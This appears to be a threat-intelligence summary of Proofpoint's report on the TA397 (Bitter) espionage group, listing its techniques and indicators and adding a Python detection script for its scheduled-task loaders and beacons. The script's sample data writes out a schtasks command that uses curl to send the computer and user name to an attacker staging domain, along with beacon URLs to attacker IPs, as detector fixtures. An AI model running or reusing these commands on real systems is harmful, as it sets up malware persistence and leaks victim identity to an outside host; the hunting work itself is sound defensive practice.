The Bitter End: Unraveling Eight Years of Espionage Antics—Part One


TA397 is a state-backed espionage group likely operating on behalf of the Indian state, targeting government and defense organizations primarily in Europe and Asia with interests in China and neighboring countries. The group uses spearphishing emails, scheduled tasks, and various malware payloads to conduct intelligence gathering, exhibiting consistent infrastructure activity within Indian Standard Time working hours. #TA397 #Bitter #BDarkRAT #KugelBlitz #MiyaRAT

Keypoints

  • TA397 is assessed as a state-backed threat actor aligned with Indian intelligence, focused on espionage against governments, defense, and diplomatic targets in Europe and Asia.
  • The group frequently uses spearphishing with attachments or URLs whose payloads create scheduled tasks that fetch and run the next stage, often through obfuscated PowerShell commands and a range of container and shortcut file types including MSC, LNK, and CHM files.
  • TA397’s campaigns often masquerade as legitimate government or embassy entities, including those of Madagascar and Mauritius, using topical subject lines to blend into legitimate email traffic.
  • Hands-on-keyboard activity by TA397 is observed within Indian Standard Time working hours and involves deployment of RATs such as wmRAT, MiyaRAT, and BDarkRAT, as well as payloads such as KugelBlitz and the Demon agent from the Havoc C2 framework.
  • Infrastructure analysis shows consistent domain registration, certificate issuance, and activity timestamps aligned with Indian Standard Time business hours, strengthening attribution to South Asian origin.
  • The group consistently includes the victim's computer name and username in the beacons sent to its staging PHP endpoints, and fronts that infrastructure with Let's Encrypt TLS certificates so the traffic blends in with ordinary HTTPS.
  • TA397 demonstrates operational maturity through campaign targeting, payload diversity, and infrastructure fingerprints but shows less sophistication in phishing content compared to other state-backed actors.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – TA397 uses spearphishing emails with malicious attachments (e.g., RAR-enclosed CHM files) to gain initial access. (“The emails in the campaigns we observed typically contained either a direct attachment or a URL…”)
  • [T1053.005] Scheduled Task/Job: Scheduled Task – The group consistently creates scheduled tasks that beacon to C2 servers every 16-19 minutes. (“Scheduled tasks which beacon every 16 minutes to the staging domain woodstocktutors[.]com…”)
  • [T1105] Ingress Tool Transfer – TA397 transfers payloads using files downloaded via PowerShell or curl from attacker-controlled infrastructure. (“PowerShell through conhost.exe to download and run the next stage payload every 16 minutes with the curl utility.”)
  • [T1083] File and Directory Discovery – Hands-on-keyboard activity includes enumerating directories and redirecting the listing into a file with a document extension, ready for collection. (“cd C:\programdata” followed by “dir > abc1.pdf”)
  • [T1005] Data from Local System – The actor exfiltrates files including scanned government documents from infected machines. (“Within TA397’s drive, Proofpoint found two documents… likely exfiltrated from TA397 victims.”)
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 beaconing and data exfiltration is performed over HTTP/HTTPS using PHP endpoints on staging domains. (“HTTP POST requests sent to staging domain PHP endpoints such as /svupfl.php and /urf.php”)
  • [T1204] User Execution – Infection depends on user opening and executing malicious attachments or links. (“If double clicked and run by the user, the MSC started mmc.exe setting up scheduled tasks…”)
  • [T1218] System Binary Proxy Execution – Malicious MSC files are executed through mmc.exe (MITRE tracks this specifically as T1218.014, MMC), while conhost.exe, cmd.exe, and the built-in curl utility are used as living-off-the-land binaries to create scheduled tasks and download payloads. (“Using conhost.exe and cmd.exe commands to create scheduled tasks and download payloads.”)

Indicators of Compromise

  • [Domain] TA397 staging domains used for payload delivery and C2: mnemautoregsvc[.]com (October 2024), jacknwoods[.]com (November 2024), woodstocktutors[.]com (April 2025), princecleanit[.]com (March 2025), utizviewstation[.]com (February 2025), warsanservices[.]com (April 2025)
  • [SHA256] Samples linked to scheduled task loaders: 1b67fc55fd050d011d6712ac17315112767cac8bbe059967b70147610933b6c1 (LNK loader, December 2024), 7c5dde52845ecae6c80c70af2200d34ef0e1bc6cbf3ead1197695b91acd22a67 (CHM loader, December 2024), 55f75724386dbe740c0b868da913af2c8b280335da4fde64e2300c776b79d4e8 (CHM loader, February/March 2025)
  • [URL] Payload delivery and command URLs including: hxxp://46.229.55[.]63/svch.php?li=%computername%..%username% (December 2024), hxxp://95.169.180[.]122/vbgf.php?mo=%computername%–%username% (December 2024)
  • [IP Address] Payload hosting and C2 IPs: 72.18.215[.]108 (Havoc C2 communication), 173.254.204[.]72 (payload hosting, noted 404 error on dune64.log)
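The two most stable fingerprints on this page are the scheduled-task loader (a minute-schedule task whose action invokes curl or PowerShell against a staging host) and the beacon URL that carries %computername% and %username% to a PHP endpoint. The following hunting script is an added example, not code from the Proofpoint report: it runs both checks over constructed process-creation events (Sysmon Event ID 1 shape, flattened to tuples) and constructed proxy lines, correlates beacon spacing per host, and matches the page's defanged IOCs after refanging them. The log layouts, host names, task names, and file paths are assumptions for the example; the 16-minute interval, the `..` and `--` separators, and the domain, IP, and PHP endpoint names are the ones listed above.

```python
import re
from collections import defaultdict
from datetime import datetime

# IOCs exactly as listed on the page (defanged). Refanged below for matching.
TA397_IOCS = [
    "mnemautoregsvc[.]com", "jacknwoods[.]com", "woodstocktutors[.]com",
    "princecleanit[.]com", "utizviewstation[.]com", "warsanservices[.]com",
    "46.229.55[.]63", "95.169.180[.]122", "72.18.215[.]108", "173.254.204[.]72",
]


def refang(indicator):
    """Restore 'a[.]b' to 'a.b' so page-style IOCs match live log fields."""
    return indicator.replace("[.]", ".")


IOC_HOSTS = {refang(i) for i in TA397_IOCS}

# Loader fingerprint: schtasks /create on a minute schedule (order of switches
# does not matter) whose /tr action fetches a URL with curl/powershell/conhost.
SCHTASKS_RE = re.compile(
    r'schtasks(?:\.exe)?\s+/create\b(?=.*?/sc\s+minute\b)(?=.*?/mo\s+(?P<mo>\d+))'
    r'(?=.*?/tr\s+"?(?P<action>[^"]+))',
    re.I,
)
DOWNLOAD_RE = re.compile(r"\b(?:curl|powershell|conhost)\b.*https?://", re.I)

# Beacon fingerprint: <host>/<name>.php?<param>=<computername>(..|--)<username>
BEACON_RE = re.compile(
    r"https?://(?P<host>[^/\s:]+)(?::\d+)?\S*?/(?P<script>\w+\.php)\?"
    r"\w+=(?P<comp>[A-Za-z0-9_-]+)(?:\.\.|--)(?P<user>[A-Za-z0-9_.-]+)"
)

# Constructed sample events: (utc time, host, image, command line). Only the
# first is meant to be flagged; the others are benign or out-of-band tasks.
PROCESS_EVENTS = [
    ("2025-04-02T09:31:05Z", "WS-0142", r"C:\Windows\System32\schtasks.exe",
     r'schtasks /create /sc minute /mo 16 /tn "DsSvcCleanup" /tr "conhost.exe --headless '
     r'cmd /c curl -s https://woodstocktutors.com/svupfl.php?li=%computername%..%username% '
     r'-o C:\ProgramData\a.log"'),
    ("2025-04-02T09:40:00Z", "WS-0142", r"C:\Windows\System32\schtasks.exe",
     r'schtasks /create /sc daily /st 02:00 /tn "NightlyBackup" /tr "C:\Tools\backup.exe"'),
    ("2025-04-02T09:41:00Z", "LT-0077", r"C:\Windows\System32\schtasks.exe",
     r'schtasks /create /sc minute /mo 5 /tn "Heartbeat" /tr "C:\Agent\hb.exe"'),
    ("2025-04-02T09:42:00Z", "LT-0077", r"C:\Windows\System32\schtasks.exe",
     r'schtasks /create /sc minute /mo 17 /tn "Sync" /tr "powershell -File C:\Scripts\sync.ps1"'),
]

# Constructed proxy lines: "<utc> <source host> <method> <url> <status>".
PROXY_LOGS = [
    "2025-04-02T09:30:00Z WS-0142 GET https://update.example.com/api/status.php?id=1234 200",
    "2025-04-02T09:47:10Z WS-0142 POST http://46.229.55.63/svch.php?li=WS-0142..jdoe 200",
    "2025-04-02T10:03:11Z WS-0142 POST http://46.229.55.63/svch.php?li=WS-0142..jdoe 200",
    "2025-04-02T10:19:09Z WS-0142 POST http://46.229.55.63/svch.php?li=WS-0142..jdoe 404",
    "2025-04-02T11:02:33Z LT-0077 GET http://95.169.180.122/vbgf.php?mo=LT-0077--asmith 200",
]


def find_task_loaders(events, low=15, high=20):
    """Flag minute-schedule tasks in the 15-20 minute band whose action fetches a URL."""
    hits = []
    for ts, host, _image, cmdline in events:
        m = SCHTASKS_RE.search(cmdline)
        if not m:
            continue
        mo, action = int(m.group("mo")), m.group("action")
        if low <= mo <= high and DOWNLOAD_RE.search(action):
            hits.append({"time": ts, "host": host, "interval_min": mo, "action": action})
    return hits


def find_beacons(lines):
    """Pull staging host, script and victim identity out of beacon-shaped URLs."""
    beacons = []
    for line in lines:
        ts, src, method, url, _status = line.split()
        m = BEACON_RE.search(url)
        if not m:
            continue
        beacons.append({
            "time": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), "src": src,
            "method": method, "staging": m.group("host"), "script": m.group("script"),
            "computer": m.group("comp"), "user": m.group("user"),
            "known_ioc": m.group("host") in IOC_HOSTS,
        })
    return beacons


def beacon_intervals(beacons):
    """Minutes between successive beacons per source host; ~16 matches the report."""
    by_src = defaultdict(list)
    for b in sorted(beacons, key=lambda b: b["time"]):
        by_src[b["src"]].append(b["time"])
    return {src: [round((t2 - t1).total_seconds() / 60, 1) for t1, t2 in zip(ts, ts[1:])]
            for src, ts in by_src.items()}


def hunt(events, lines):
    """Combine both checks into one per-host summary."""
    loaders, beacons = find_task_loaders(events), find_beacons(lines)
    return {
        "task_loader_hosts": sorted({h["host"] for h in loaders}),
        "beaconing_hosts": sorted({b["src"] for b in beacons}),
        "known_ioc_hits": sum(b["known_ioc"] for b in beacons),
        "intervals_min": beacon_intervals(beacons),
    }


if __name__ == "__main__":
    print(hunt(PROCESS_EVENTS, PROXY_LOGS))
```

The schtasks rule deliberately requires both the 15-20 minute band and a URL in the task action, so the constructed 5-minute heartbeat and the 17-minute local PowerShell script are not flagged; the beacon rule keys on the host..user or host--user query value rather than on the IOC list, so a freshly registered staging domain still surfaces and the IOC match is reported separately as corroboration.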


Read more: https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one